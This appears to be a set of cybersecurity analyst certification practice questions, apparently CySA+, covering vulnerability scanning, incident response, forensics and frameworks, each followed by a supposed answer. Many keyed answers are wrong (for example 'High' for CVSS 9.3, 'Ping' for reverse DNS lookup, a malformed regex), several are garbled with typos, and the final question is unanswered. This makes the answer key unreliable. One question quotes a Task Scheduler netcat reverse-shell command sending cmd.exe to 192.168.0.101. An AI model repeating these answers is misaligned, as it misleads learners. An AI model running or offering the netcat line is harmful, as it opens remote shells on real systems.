You are interpreting a Nessus vulnerability scan report and identified a vulnerability in the system which has a CVSS attack vector rating of A. Based on this information, which of the following statements would be true? A. The attacker must have access to the local network that the system is connected to B. Exploiting the vulnerability does not require any specialized conditions C. The attacker must have physical or logical access to the affected system D. Exploiting the vulnerability require the existence of specialized conditions
A. The attacker must have access to the local network that the system is connected to
Which of the following principles describes how a security analyst should communicate during an incident? A. The communication should be limited to trusted parties only. B. The communication should be limited to security staff only. C. The communication should come from law enforcement. D. The communication should be limited to management only.
A. The communication should be limited to trusted parties only
A system administrator has reviewed the following output: (See image Q-44) Which of the following can a system administrator infer from the above output? A. The company email server is running a non-standard port. B. The company email server has been compromised. C. The company is running a vulnerable SSH server. D. The company web server has been compromised.
A. The company's email server is running on a non-standard port
A cybersecurity analyst is retained by a firm for an open investigation. Upon arrival, the cybersecurity analyst reviews several security logs.Given the following snippet of code: sc config schedule start auto net start schedule at 12:20 ""C:\nc.exe 192.168.0.101 777 -e cmd.exe"" Which of the following combinations BEST describes the situation and recommendations to be made for this situation? A. The cybersecurity analyst has discovered host 192.168.0.101 using Windows Task Scheduler at 13:30 to runnc.exe; recommend proceeding with the next step of removing the host from the network. B. The cybersecurity analyst has discovered host 192.168.0.101 to be running thenc.exe file at 13:30 using the auto cron job remotely, there are no recommendations since this is not a threat currently. C. The cybersecurity analyst has discovered host 192.168.0.101 is beaconing every day at 13:30 using thenc.exe file; recommend proceeding with the next step of removing the host from the network. D. The security analyst has discovered host 192.168.0.101 is a rogue device on the network, recommend proceeding with the next step of removing the host from the network.
A. The cybersecuirty analyst has discovered host 192.168.0.101 using Windows Task Scheduler at 13:30 to runnc.exe; recommend proceeding with the next step of removing that host from the network
Several users have reported that when attempting to save documents in team folders, the following message is received:The File Cannot Be Copied or Moved "" Service Unavailable.Upon further investigation, it is found that the syslog server is not obtaining log events from the file server to which the users are attempting to copy files. Which of the following is the MOST likely scenario causing these issues? A. The network is saturated, causing network congestion B. The file server is experiencing high CPU and memory utilization C. Malicious processes are running on the file server D. All the available space on the file server is consumed
A. The network is saturated, causing network congestion
The Chief Information Security Officer (CISO) asked for a topology discovery to be conducted and verified against the asset inventory. The discovery is failing and not providing reliable or complete data. The syslog shows the following information: (see image Q-170) Which of the following describes the reason why the discovery is failing? A. The scanning tool lacks valid LDAP credentials. B. The scan is returning LDAP error code 52255a. C. The server running LDAP has antivirus deployed. D. The connection to the LDAP server is timing out. E. The LDAP server is configured on the wrong port.
A. The scanning tool lacks valid LDAP credentials
An application development company released a new version of its software to the public. A few days after the release, the company is notified by end users that the application is notably slower, and older security bugs have reappeared in the new release. The development team has decided to include the security analyst during their next development cycle to help address the reported issues. Which of the following should the security analyst focus on to remedy the existing reported problems? A. The security analyst should perform security regression testing during each application development cycle. B. The security analyst should perform end user acceptance security testing during each application development cycle. C. The security analyst should perform secure coding practices during each application development cycle. D. The security analyst should perform application fuzzing to locate application vulnerabilities during each application development cycle.
A. The security analyst should perform security regression testing during each application development cycle
A security analyst has determined that the user interface on an embedded device is vulnerable to common SQL injections. The device is unable to be replaced, and the software cannot be upgraded. Which of the following should the security analyst recommend to add additional security to this device? A. The security analyst should recommend this device be placed behind a WAF. B. The security analyst should recommend an IDS be placed on the network segment. C. The security analyst should recommend this device regularly export the web logs to a SIEM system. D. The security analyst should recommend this device be included in regular vulnerability scans.
A. The security analyst should recommend this device be places behind a WAF
A new policy requires the security team to perform web application and OS vulnerability scans. All of the company's web applications use federated authentication and are accessible via a central portal. Which of the following should be implemented to ensure a more thorough scan of the company's web application, while at the same time reducing false positives? A. The vulnerability scanner should be configured to perform authenticated scans. B. The vulnerability scanner should be installed on the web server. C. The vulnerability scanner should implement OS and network service detection. D. The vulnerability scanner should scan for known and unknown vulnerabilities.
A. The vulnerability scanner should be configured to perform authenticated scans
Review the image (see image Q-30), which of the following has occurred? A. This is normal network traffic. B. 123.120.110.212 is infected with a Trojan. C. 172.29.0.109 is infected with a worm. D. 172.29.0.109 is infected with a Trojan.
A. This is normal network traffic
Following a recent security breach, a post-mortem was done to analyze the driving factors behind the breach. The cybersecurity analysis discussed potential impacts, mitigations, and remediations based on current events and emerging threat vectors tailored to specific stakeholders. Which of the following is this considered to be? A. Threat intelligence B. Threat information C. Threat data D. Advanced persistent threats
A. Threat intelligence
A computer at a company was used to commit a crime. The system was seized and removed for further analysis. Which of the following is the purpose of labeling cables and connections when seizing the computer system? A. To capture the system configuration as it was at the time it was removed B. To maintain the chain of custody C. To block any communication with the computer system from attack D. To document the model, manufacturer, and type of cables connected
A. To capture the system configuration as it was at the time it was removed
Which of the following represent the reasoning behind careful selection of the timelines and time-of-day boundaries for an authorized penetration test? (Choose two.) A. To schedule personnel resources required for test activities B. To determine frequency of team communication and reporting C. To mitigate unintended impacts to operations D. To avoid conflicts with real intrusions that may occur E. To ensure tests have measurable impact to operations
A. To schedule personnel resources required for test activities C. To mitigate unintended impacts to operations
What phase of the software development lifecycle is sometimes known as the acceptance, installation, and deployment phase? A. Training and Transition B. Disposition C. Development D. Operations and Maintenance
A. Training and Transition
An executive tasked a security analyst to aggregate past logs, traffic, and alerts on a particular attack vector. The analyst was then tasked with analyzing the data and making predictions on future complications regarding this attack vector. Which of the following types of analysis is the security analyst MOST likely conducting? A. Trend analysis B. Behavior analysis C. Availability analysis D. Business analysis
A. Trend analysis
During a recent audit, there were a lot of findings similar to and including the following: (see image Q-227) Which of the following would be the BEST way to remediate these findings and minimize similar findings in the future? A. Use an automated patch management solution. B. Remove the affected software programs from the servers. C. Run Microsoft Baseline Security Analyzer on all of the servers. D. Schedule regular vulnerability scans for all servers on the network.
A. Use an automated patch management solution
A security analyst is creating baseline system images to remediate vulnerabilities found in different operating systems. Each image needs to be scanned before it is deployed. The security analyst must ensure the configurations match industry standard benchmarks and the process can be repeated frequently. Which of the following vulnerability options would BEST create the process requirements? A. Utilizing an operating system SCAP plugin B. Utilizing an authorized credential scan C. Utilizing a non-credential scan D. Utilizing a known malware plugin
A. Utilizing an operating system SCAP plugin
A recent audit has uncovered several coding errors and a lack of input validation being used on a public portal. Due to the nature of the portal and the severity of the errors, the portal is unable to be patched. Which of the following tools could be used to reduce the risk of being compromised? A. Web application firewall B. Network firewall C. Web proxy D. Intrusion prevention system
A. Web application firewall
You just completed an nmap scan against a workstation and received the following output: -=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=- # nmap diontraining012 Starting Nmap ( http://nmap.org ) Nmap scan report for diontraining012 (192.168.14.61) Not shown: 997 filtered ports PORT STATE 135/tcp open 139/tcp open 445/tcp open Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds -=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=- Based on these results, which of the following operating system is most likely being run by this workstation? A. Windows B. CentOS C. macOS D. Ubuntu
A. Windows
A newly discovered malware has a known behavior of connecting outbound to an external destination on port 27500 for the purposes of exfiltrating data. The following are four snippets taken from running netstat ""an on separate Windows workstations: (see image Q-204) Based on the above information, which of the following is MOST likely to be exposed to this malware? A. Workstation A B. Workstation B C. Workstation C D. Workstation D
A. Workstation A
What SCAP component provides a language for specifying checklists? A. XCCDF B. CPE C. OVAL D. CCE
A. XCCDF
An analyst is observing unusual network traffic from a workstation. The workstation is communicating with a known malicious site over an encrypted tunnel. A full antivirus scan with an updated antivirus signature file does not show any sign of infection. Which of the following has occurred on the workstation? A. Zero-day attack B. Known malware attack C. Session hijack D. Cookie stealing
A. Zero-day attack
The Chief Information Security Officer (CISO) asks a security analyst to write a new SIEM search rule to determine if any credit card numbers are being written to log files. The CISO and security analyst suspect the following log snippet contains real customer card data: RecordError-dumping affected entry: CustomerName: John Doe Card1RawString: 0413555577814399 Card2RawString: 0444719465780100 CVV: not-stored CustomerID: 1234-5678 Which of the following expressions would find potential credit card numbers in a format that matches the log snippet? A. ^[0-9](16)$ B. (0-9) x 16 C. "1234-5678" D. "04*"
A. ^[0-9](16)$
A security analyst is performing a forensic analysis on a machine that was the subject of some historic SIEM alerts. The analyst noticed some network connections utilizing SSL on non-common ports, copies of svchost.exe and cmd.exe in %TEMP% folder, and RDP files that had connected to external IPs. Which of the following threats has the security analyst uncovered? A. DDoS B. APT C. Ransomware D. Software vulnerability
B. APT
After analyzing and correlating activity from multiple sensors, the security analyst has determined a group from a high-risk country is responsible for a sophisticated breach of the company network and continuous administration of targeted attacks for the past three months. Until now, the attacks went unnoticed.This is an example of: A. privilege escalation. B. advanced persistent threat. C. malicious insider threat. D. spear phishing.
B. Advanced persistent threat
A threat intelligence feed has posted an alert stating there is a critical vulnerability in the kernel. Unfortunately, the company's asset inventory is not current. Which of the following techniques would a cybersecurity analyst perform to find all affected servers within an organization? A. A manual log review from data sent to syslog B. An OS fingerprinting scan across all hosts C. A packet capture of data traversing the server network D. A service discovery scan on the network
B. An OAS fingerprinting scan across all hosts
Given the following log snippet: (see image Q-226) Which of the following describes the events that have occurred? A. An attempt to make an SSH connection from "superman" was done using a password. B. An attempt to make an SSH connection to 192.168.1.166 was done using PKI. C. An attempt to make an SSH connection from outside the network was done using PKI. D. An attempt to make an SSH connection from an unknown IP address was done using a password.
B. An attempt to make an SSH connection to 192.138.1.166 was done using PKI
A cybersecurity analyst has received an alert that well-known "call home" messages are continuously observed by network sensors at the network boundary. The proxy firewall successfully drops the messages. After determining the alert was a true positive, which of the following represents the MOST likely cause? A. Attackers are running reconnaissance on company resources. B. An outside command and control system is attempting to reach an infected system. C. An insider is trying to exfiltrate information to a remote network. D. Malware is running on a company system.
B. An outside command and control system is attempting to reach an infected system
A cybersecurity analyst has several SIEM event logs to review for possible APT activity. The analyst was given several items that include lists of indicators for bothIP addresses and domains. Which of the following actions is the BEST approach for the analyst to perform? A. Use the IP addresses to search through the event logs. B. Analyze the trends of the events while manually reviewing to see if any of the indicators match. C. Create an advanced query that includes all of the indicators, and review any of the matches. D. Scan for vulnerabilities with exploits known to have been used by an APT.
B. Analyze the trends of the events while manually reviewing to see if any of the indicators match
An organization wants to remediate vulnerabilities associated with its web servers. An initial vulnerability scan has been performed, and analysts are reviewing the results. Before starting any remediation, the analysts want to remove false positives to avoid spending time on issues that are not actual vulnerabilities. Which of the following would be an indicator of a likely false positive? A. Reports indicate that findings are informational. B. Any items labeled "˜low' are considered informational only. C. The scan result version is different from the automated asset inventory. D. "˜HTTPS' entries indicate the web page is encrypted securely.
B. Any items labeled "low" are considered informational only
An organization wants to remediate vulnerabilities associated with its web servers. An initial vulnerability scan has been performed, and analysts are reviewing the results. Before starting any remediation, the analysts want to remove false positives to avoid spending time on issues that are not actual vulnerabilities. Which of the following would be an indicator of a likely false positive? A. Reports show the scanner compliance plug-in is out-of-date. B. Any items labeled "˜low' are considered informational only. C. The scan result version is different from the automated asset inventory. D. "˜HTTPS' entries indicate the web page is encrypted securely.
B. Any items labeled "low" are considered informational only
During which of the following NIST risk management framework steps would an information system security engineer identify inherited security controls and tailor those controls to the system? A. Categorize B. Select C. Implement D. Assess
B. Select
A cybersecurity analyst is hired to review the security posture of a company. The cybersecurity analyst notices a very high network bandwidth consumption due toSYN floods from a small number of IP addresses.Which of the following would be the BEST action to take to support incident response? A. Increase the company's bandwidth. B. Apply ingress filters at the routers. C. Install a packet capturing tool. D. Block all SYN packets.
B. Apply ingress filters at the routers
When does an attacker try to gain complete control of a system during a penetration test? A. Planning B. Attack C. Reporting D. Discovery
B. Attack
What is the proper threat classification for a security breach that employs brute-force methods to compromise, degrade, or destroy systems? A. Impersonation B. Attrition C. Improper Usage D. Loss or theft of equipment
B. Attrition
An ATM in a building lobby has been compromised. A security technician has been advised that the ATM must be forensically analyzed by multiple technicians.Which of the following items in a forensic tool kit would likely be used FIRST? (Choose two.) A. Drive adapters B. Chain of custody form C. Write blockers D. Crime tape E. Hashing utilities F. Drive imager
B. Chain of custody form C. Write blockers
A security audit revealed that port 389 has been used instead of 636 when connecting to LDAP for the authentication of users. The remediation recommended by the audit was to switch the port to 636 wherever technically possible. Which of the following is the BEST response? A. Correct the audit. This finding is a well-known false positive; the services that typically run on 389 and 636 are identical. B. Change all devices and servers that support it to 636, as encrypted services run by default on 636. C. Change all devices and servers that support it to 636, as 389 is a reserved port that requires root access and can expose the server to privilege escalation attacks. D. Correct the audit. This finding is accurate, but the correct remediation is to update encryption keys on each of the servers to match port 636.
B. Change all devices and servers that support it to 636, as encrypted services run by default on 636
Which of the following elements is LEAST likely to be included in an organization's data retention policy? A. Minimum retention period B. Classification of information C. Maximum retention period D. Description of information needing to be retained
B. Classification of information
A security analyst determines that several workstations are reporting traffic usage on port 3389. All workstations are running the latest OS patches according to patch reporting. The help desk manager reports some users are getting logged off of their workstations, and network access is running slower than normal. The analyst believes a zero-day threat has allowed remote attackers to gain access to the workstations. Which of the following are the BEST steps to stop the threat without impacting all services? (Choose two.) A. Change the public NAT IP address since APTs are common. B. Configure a group policy to disable RDP access. C. Disconnect public Internet access and review the logs on the workstations. D. Enforce a password change for users on the network. E. Reapply the latest OS patches to workstations. F. Route internal traffic through a proxy server.
B. Configure a group policy to disable RDP access D. Enforce a password change for users on the network
Several accounting department users are reporting unusual Internet traffic in the browsing history of their workstations after returning to work and logging in. The building security team informs the IT security team that the cleaning staff was caught using the systems after the accounting department users left for the day.Which of the following steps should the IT security team take to help prevent this from happening again? (Choose two.) A. Install a web monitor application to track Internet usage after hours. B. Configure a policy for workstation account timeout at three minutes. C. Configure NAC to set time-based restrictions on the accounting group to normal business hours. D. Configure mandatory access controls to allow only accounting department users to access the workstations. E. Set up a camera to monitor the workstations for unauthorized use.
B. Configure a policy for workstation account timeout t three minutes C. Configure NAC to set time-based restrictions on the accounting group to normal business hours
A vulnerability scan has returned the following information: Detailed Results 10.10.10.214 (LOTUS-10-214) Windows Shares Category: Windows CVE ID: - Vendor Ref: - Buqtraq ID: - Service Modified - 4.16.2014 Enumeration Results: print$ C:\windows\system32\speel\drivers ofcscan C:\Program Files\Trend Micro\OfficeScan\PCCSRV Temp C:\temp Which of the following describes the meaning of these results? A. There is an unknown bug in a Lotus server with no Bugtraq ID. B. Connecting to the host using a null session allows enumeration of share names. C. Trend Micro has a known exploit that must be resolved or patched. D. No CVE is present, so it is a false positive caused by Lotus running on a Windows server.
B. Connecting to the host using a null session allows enumeration of share names
Trevor is responsible for conducting the vulnerability scans for his organization. His supervisor must produce a monthly report for the CIO that includes the number of open vulnerabilities. What process should Trevor use to ensure the supervisor gets the information needed for their monthly report? A. Run a report each month and then email it to his supervisor B. Create a custom report that is automatically emailed each month to the supervisor with the needed information C. Create an account for the supervisor to the vulnerability scanner so they can run their own reports D. Create am account for the supervisor's assistant so they can create their own reports
B. Create a custom report that is automatically emailed each month to the supervisor with the needed information
An analyst's vulnerability scanner did not have the latest set of signatures installed. Due to this, several unpatched servers may have vulnerabilities that were undetected by their scanner. You have directed the analyst to update their vulnerability scanner with the latest signatures at least 24 hours before conducting any scans, but the results of their scans still appear to be the same. Which of the following logical controls should you use to address this situation? A. Test the vulnerability remediations in a sandbox before deploying them into production B. Create a script to automatically update the signatures every 24 hours C. Ensure the analyst manually validates that the updates are being performed as directed D. Configure the vulnerability scanners to run in credentialed mode
B. Create a script to automatically update the signatures every 24 hours
Which of the following provides a cryptographic authentication mechanism to positively identify an organization as the authorized sender of email for a particular domain name? A. SPF B. DKIM C. SMTP D. DMARC
B. DKIM
When reviewing network traffic, a security analyst detects suspicious activity: (see image Q-110) Based on the log above, which of the following vulnerability attacks is occurring? A. ShellShock B. DROWN C. Zeus D. Heartbleed E. POODLE
B. DROWN
A systems administrator is trying to secure a critical system. The administrator has placed the system behind a firewall, enabled strong authentication, and required all administrators of this system to attend mandatory training.Which of the following BEST describes the control being implemented? A. Audit remediation B. Defense in depth C. Access control D. Multifactor authentication
B. Defense in depth
A cybersecurity analyst was hired to resolve a security issue within a company after it was reported that many employee account passwords had been compromised. Upon investigating the incident, the cybersecurity analyst found that a brute force attack was launched against the company.Which of the following remediation actions should the cybersecurity analyst recommend to senior management to address these security issues? A. Prohibit password reuse using a GPO. B. Deploy multifactor authentication. C. Require security awareness training. D. Implement DLP solution.
B. Deploy multi factor authentication
Mike has discovered a service is running on one of the ports known as a registered port while running a port scanner. Based on this, which of the following can Mike determine? A. Vulnerability status of the service B. Service is running on a port between 1024 and 49151 C. Service is running on a port between 0-1023 D. Name of the service
B. Service is running on a port between 1024 and 49151
Which of the allowing is a best practice with regard to interacting with the media during an incident? A. Allow any senior management level personnel with knowledge of the incident to discuss it. B. Designate a single port of contact and at least one backup for contact with the media. C. Stipulate that incidents are not to be discussed with the media at any time during the incident. D. Release financial information on the impact of damages caused by the incident.
B. Designate a single port of contact and at least one backup fro contact with the media
A security analyst is reviewing the following log after enabling key-based authentication. (See image Q-36) Given the above information, which of the following steps should be performed NEXT to secure the system? A. Disable anonymous SSH logins. B. Disable password authentication for SSH. C. Disable SSHv1. D. Disable remote root SSH logins.
B. Disable password authentication for SSH
The primary difference in concern between remediating identified vulnerabilities found in general-purpose IT network servers and that of SCADA systems is that: A. change and configuration management processes do not address SCADA systems. B. doing so has a greater chance of causing operational impact in SCADA systems. C. SCADA systems cannot be rebooted to have changes to take effect. D. patch installation on SCADA systems cannot be verified.
B. Doing so has a greater chance of causing operational impact in SCASA systems
Which of the following information is traditionally found in the SOW for a penetration test? A. Maintenance windows B. Excluded hosts C. Timing of scan D. Format of the executive summary report
B. Excluded hosts
What regulation protects the privacy of student educational records? A. HIPAA B. FERPA C. SOX D. GLBA
B. FERPA
A security analyst is adding input to the incident response communication plan. A company officer has suggested that if a data breach occurs, only affected parties should be notified to keep an incident from becoming a media headline. Which of the following should the analyst recommend to the company officer? A. The first responder should contact law enforcement upon confirmation of a security incident in order for a forensics team to preserve chain of custody. B. Guidance from laws and regulations should be considered when deciding who must be notified in order to avoid fines and judgements from non-compliance. C. An externally hosted website should be prepared in advance to ensure that when an incident occurs victims have timely access to notifications from a non- compromised recourse. D. The HR department should have information security personnel who are involved in the investigation of the incident sign non-disclosure agreements so the company cannot be held liable for customer data that might be viewed during an investigation.
B. Guidance from laws and regulations should be considered when deciding who must be notified in order to avoid fines and judgments from non-compliance
You are going to perform a forensic disk image of a macOS laptop. What type of hard drive format should you expect to encounter? A. NTFS B. HFS+ C. FAT32 D. exFAT
B. HFS+
Maria is interpreting a vulnerability that has a CVSS base score of 9.3. What risk category would this vulnerability fit into? A. Critical B. High C. Medium D. Low
B. High
Which of the protocols listed is NOT likely to be a trigger for a vulnerability scan alert when it is used to support a virtual private network (VPN)? A. SSLv2 B. IPSec C. PPTP D. SSLv3
B. IPSec
An organization has recently recovered from an incident where a managed switch had been accessed and reconfigured without authorization by an insider. The incident response team is working on developing a lessons learned report with recommendations. Which of the following recommendations will BEST prevent the same attack from occurring in the future? A. Remove and replace the managed switch with an unmanaged one. B. Implement a separate logical network segment for management interfaces. C. Install and configure NAC services to allow only authorized devices to connect to the network. D. Analyze normal behavior on the network and configure the IDS to alert on deviations from normal.
B. Implement a separate logical network segment for management interfaces
In 2014, Apple's implementation of SSL had a severe vulnerability that, when exploited, allowed an attacker to gain a privileged network position that would allow them to capture or modify data in an SSL/TLS session. This was caused by poor programming in which a failed check of the connection would exit the function too early. Based on this description, what is this an example of? A. Insecure object reference B. Improper error handling C. Insufficient logging and monitoring D. Use of insecure functions
B. Improper error handling
A recently issued audit report highlighted exceptions related to end-user handling of sensitive data and access credentials. A security manager is addressing the findings. Which of the following activities should be implemented? A. Update the password policy B. Increase training requirements C. Deploy a single sign-on platform D. Deploy Group Policy Objects
B. Increase training requirements
Which control provides the best protection against both SQL injection and cross-site scripting attacks? A. CSRF B. Input validation C. Network layer firewall D. Hypervisor
B. Input validation
Your organization has recently suffered a cyber attack when an employee made an unauthorized modification to another employee's timesheet and payroll records. What objective of cybersecurity has been violated? A. Confidentiality B. Integrity C. Availability D. Non-repudiation
B. Integrity
Management is concerned with administrator access from outside the network to a key server in the company. Specifically, firewall rules allow access to the server from anywhere in the company. Which of the following would be an effective solution? A. Honeypot B. Jump box C. Server hardening D. Anti-malware
B. Jump box
What technology is NOT a shared authentication protocol? A. OpenID B. LDAP C. OAuth D. Facebook Connect
B. LDAP
Which of the following actions should occur to address any open issues while closing an incident involving various departments within the network? A. Incident response plan B. Lessons learned report C. Reverse engineering process D. Chain of custody documentation
B. Lessons learned report
A security analyst has determined the security team should take action based on the following log: (see image Q-200) Which of the following should be used to improve the security posture of the system? A. Enable login account auditing. B. Limit the number of unsuccessful login attempts. C. Upgrade the firewalls. D. Increase password complexity requirements.
B. Limit the number of unsuccessful login attempts
A security analyst at a small regional bank has received an alert that nation states are attempting to infiltrate financial institutions via phishing campaigns. Which of the following techniques should the analyst recommend as a proactive measure to defend against this type of threat? A. Honeypot B. Location-based NAC C. System isolation D. Mandatory access control E. Bastion host
B. Location-based NAC
On which of the following organizational resources is the lack of an enabled password or PIN a common vulnerability? A. VDI systems B. Mobile devices C. Enterprise server OSs D. VPNs E. VoIP phones
B. Mobile devices
A Chief Information Security Officer (CISO) wants to standardize the company's security program so it can be objectively assessed as part of an upcoming audit requested by management.Which of the following would holistically assist in this effort? A. ITIL B. NIST C. Scrum D. AUP E. Nessus
B. NIST
The Chief Executive Officer (CEO) instructed the new Chief Information Security Officer (CISO) to provide a list of enhancement to the company's cybersecurity operation. As a result, the CISO has identified the need to align security operations with industry best practices. Which of the following industry references is appropriate to accomplish this? A. OSSIM B. NIST C. PCI D. OWASP
B. NIST
Due to new regulations, a company has decided to institute an organizational vulnerability management program and assign the function to the security team.Which of the following frameworks would BEST support the program? (Choose two.) A. COBIT B. NIST C. ISO 27000 series D. ITIL E. OWASP
B. NIST C. ISO 27000 Series
An organization has recently experienced a data breach. A forensic analysis confirmed the attacker found a legacy web server that had not been used in over a year and was not regularly patched. After a discussion with the security team, management decided to initiate a program of network reconnaissance and penetration testing. They want to start the process by scanning the network for active hosts and open ports. Which of the following tools is BEST suited for this job? A. Ping B. Nmap C. Netstat D. ifconfig E. Wireshark F. L0phtCrack
B. Nmap
Considering confidentiality and integrity, which of the following make servers more secure than desktops? (Choose three.) A. VLANs B. OS C. Trained operators D. Physical access restriction E. Processing power F. Hard drive capacity
B. OS C. Trained operators D. Physical access restriction
Your organization is preparing for its required quarterly PCI DSS external vulnerability scan. Who is authorized to perform this scan? A. Any qualified individual B. Only an approved scanning vendor C. Anyone D. Only employees of the company
B. Only an approved scanning vendor
Matt and Jason work together to review Matt's programming code with Matt explaining what his code is doing as they review it. What type of code review is being conducted? A. Pair programming B. Over-the-shoulder C. Dual Control D. Toll assisted review
B. Over-the-shoulder
A medical organization recently started accepting payments over the phone. The manager is concerned about the impact of the storage of different types of data.Which of the following types of data incurs the highest regulatory constraints? A. PHI B. PCI C. PII D. IP
B. PCI
Which of the following would NOT be useful in defending against a zero-day threat? A. Threat intelligence B. Patching C. Segmentation D. Whitelisting
B. Patching
The development team currently consists of three developers who each specialize in a specific programming language: Developer 1 "" C++/C# Developer 2 "" Python - Developer 3 "" Assembly - Which of the following SDLC best practices would be challenging to implement with the current available staff? A. Fuzzing B. Peer review C. Regression testing D. Stress testing
B. Peer review
An alert has been distributed throughout the information security community regarding a critical Apache vulnerability. Which of the following courses of action would ONLY identify the known vulnerability? A. Perform an unauthenticated vulnerability scan on all servers in the environment. B. Perform a scan for the specific vulnerability on all web servers. C. Perform a web vulnerability scan on all servers in the environment. D. Perform an authenticated scan on all web servers in the environment.
B. Perform a scan for the specific vulnerability on all web servers
A system administrator who was using an account with elevated privileges deleted a large amount of log files generated by a virtual hypervisor in order to free up disk space. These log files are needed by the security team to analyze the health of the virtual machines. Which of the following compensating controls would help prevent this from reoccurring? (Choose two.) A. Succession planning B. Separation of duties C. Mandatory vacation D. Personnel training E. Job rotation
B. Separation of Duties D. Personnel Training
Which of the following utilities could be used to resolve an IP address to a domain name, assuming the address has a PTR record? A. ifconfig B. ping C. arp D. nbtstat
B. Ping
After running a packet analyzer on the network, a security analyst has noticed the following output: (see image Q-71) Which of the following is occurring? A. A ping sweep B. A port scan C. A network map D. A service discovery
B. Port scan
An analyst was testing the latest version of an internally developed CRM system. The analyst created a basic user account. Using a few tools in Kali's latest distribution, the analyst was able to access configuration files, change permissions on folders and groups, and delete and create new system objects. Which of the following techniques did the analyst use to perform these unauthorized activities? A. Impersonation B. Privilege escalation C. Directory traversal D. Input injection
B. Privilege escalation
A company has implemented WPA2, a 20-character minimum for the WiFi passphrase, and a new WiFi passphrase every 30 days, and has disabled SSID broadcast on all wireless access points. Which of the following is the company trying to mitigate? A. Downgrade attacks B. Rainbow tables C. SSL pinning D. Forced deauthentication
B. Rainbow tables
An analyst reviews a recent report of vulnerabilities on a company's financial application server. Which of the following should the analyst rate as being of theHIGHEST importance to the company's environment? A. Banner grabbing B. Remote code execution C. SQL injection D. Use of old encryption algorithms E. Susceptibility to XSS
B. Remote code execution
Policy allows scanning of vulnerabilities during production hours, but production servers have been crashing lately due to unauthorized scans performed by junior technicians. Which of the following is the BEST solution to avoid production server downtime due to these types of scans? A. Transition from centralized to agent-based scans. B. Require vulnerability scans be performed by trained personnel. C. Configure daily-automated detailed vulnerability reports. D. Implement sandboxing to analyze the results of each scan. E. Scan only as required for regulatory compliance.
B. Require vulnerability scans be performed by trained personnel
Alerts have been received from the SIEM, indicating infections on multiple computers. Based on threat characteristics, these files were quarantined by the host- based antivirus program. At the same time, additional alerts in the SIEM show multiple blocked URLs from the address of the infected computers; the URLs were classified as uncategorized. The domain location of the IP address of the URLs that were blocked is checked, and it is registered to an ISP in Russia. Which of the following steps should be taken NEXT? A. Remove those computers from the network and replace the hard drives. Send the infected hard drives out for investigation. B. Run a full antivirus scan on all computers and use Splunk to search for any suspicious activity that happened just before the alerts were received in the SIEM. C. Run a vulnerability scan and patch discovered vulnerabilities on the next pathing cycle. Have the users restart their computers. Create a use case in the SIEM to monitor failed logins on the infected computers. D. Install a computer with the same settings as the infected computers in the DMZ to use as a honeypot. Permit the URLs classified as uncategorized to and from that host.
B. Run a full antivirus scan on all computers and use Splunk to search for an suspicious activity that happened just before the alerts were received in the SIEM
A security analyst has just completed a vulnerability scan of servers that support a business critical application that is managed by an outside vendor. The results of the scan indicate the devices are missing critical patches. Which of the following factors can inhibit remediation of these vulnerabilities? (Choose two.) A. Inappropriate data classifications B. SLAs with the supporting vendor C. Business process interruption D. Required sandbox testing E. Incomplete asset inventory
B. SLAs with the supporting vendor C. Business process interruption
What is NOT part of the security incident validation effort? A. Scanning B. Sanitization C. Patching D. Permissions
B. Sanitization
A penetration tester is preparing for an audit of critical systems that may impact the security of the environment. This includes the external perimeter and the internal perimeter of the environment. During which of the following processes is this type of information normally gathered? A. Timing B. Scoping C. Authorization D. Enumeration
B. Scoping
A cybersecurity analyst is conducting a security test to ensure that information regarding the web server is protected from disclosure. The cybersecurity analyst requested an HTML file from the web server, and the response came back as follows: HTTP/1.1 404 Object Not Found Server: Microsoft-IIS/5.0 Date: Tues, 19 Apr 2016 06:32:24 GMT Content-Type: text/html Content-Length: 111 <html><head><title>Site Not Found</title></head><body>No web site is configured at this address. </body></html> Which of the following actions should be taken to remediate this security issue? A. Set "Allowlatescanning" to 1 in the URLScan.ini configuration file. B. Set "Removeserverheader" to 1 in the URLScan.ini configuration file. C. Set "Enablelogging" to 0 in the URLScan.ini configuration file. D. Set "Perprocesslogging" to 1 in the URLScan.ini configuration file.
B. Set "Removeserverheader" to 1 in the URLScan.ini.configuration file
You are analyzing the logs of a forensic analysts workstation and see the following:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-root@DionTraining:/home# dd if=/dev/sdc of=/dev/sdb bs=1M count=1000 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-What does the bs=1M signify in the command list above? A. Removes error messages and other incorrect data B. Sets the block size C. Send output to a blank sector D. Sets the beginning sector
B. Sets the block size
A cybersecurity analyst has several log files to review. Instead of using grep and cat commands, the analyst decides to find a better approach to analyze the logs. Given a list of tools, which of the following would provide a more efficient way for the analyst to conduct a timeline analysis, do keyword searches, and output a report? A. Kali B. Splunk C. Syslog D. OSSIM
B. Splunk
A security analyst is creating ACLs on a perimeter firewall that will deny inbound packets that are from internal addresses, reserved external addresses, and multicast addresses. Which of the following is the analyst attempting to prevent? A. Broadcast storms B. Spoofing attacks C. DDoS attacks D. Man-in-the-middle attacks
B. Spoofing attacks
Firewalls, intrusion detection systems, and RADIUS are all examples of which type of control? A. Compensating controls B. Technical controls C. Physical controls D. Administrative controls
B. Technical controls
Which of the following categories of controls are firewalls, intrusion detection systems, and a RADIUS server classified as? A. Compensating controls B. Technical controls C. Physical controls D. Administrative controls
B. Technical controls
Which of the following protocols is considered insecure and should never be used in your networks? A. HTTPS B. Telnet C. SFTP D. SSH
B. Telnet
A security analyst received several service tickets reporting that a company storefront website is not accessible by internal domain users. However, external users are accessing the website without issue. Which of the following is the MOST likely reason for this behavior? A. The FQDN is incorrect. B. The DNS server is corrupted. C. The time synchronization server is corrupted. D. The certificate is expired.
B. The DNS server is corrupted
An insurance company employs quick-response team drivers that carry corporate-issued mobile devices with the insurance company's app installed on them.Devices are configuration-hardened by an MDM and kept up to date. The employees use the app to collect insurance claim information and process payments.Recently, a number of customers have filed complaints of credit card fraud against the insurance company, which occurred shortly after their payments were processed via the mobile app. The cyber-incident response team has been asked to investigate. Which of the following is MOST likely the cause? A. The MDM server is misconfigured. B. The app does not employ TLS. C. USB tethering is enabled. D. 3G and less secure cellular technologies are not restricted.
B. The app does not employ TLS
A cybersecurity analyst has identified a new mission-essential function that utilizes a public cloud-based system. The analyst needs to classify the information processed by the system with respect to CIA. Which of the following should provide the CIA classification for the information? A. The cloud provider B. The data owner C. The cybersecurity analyst D. The system administrator
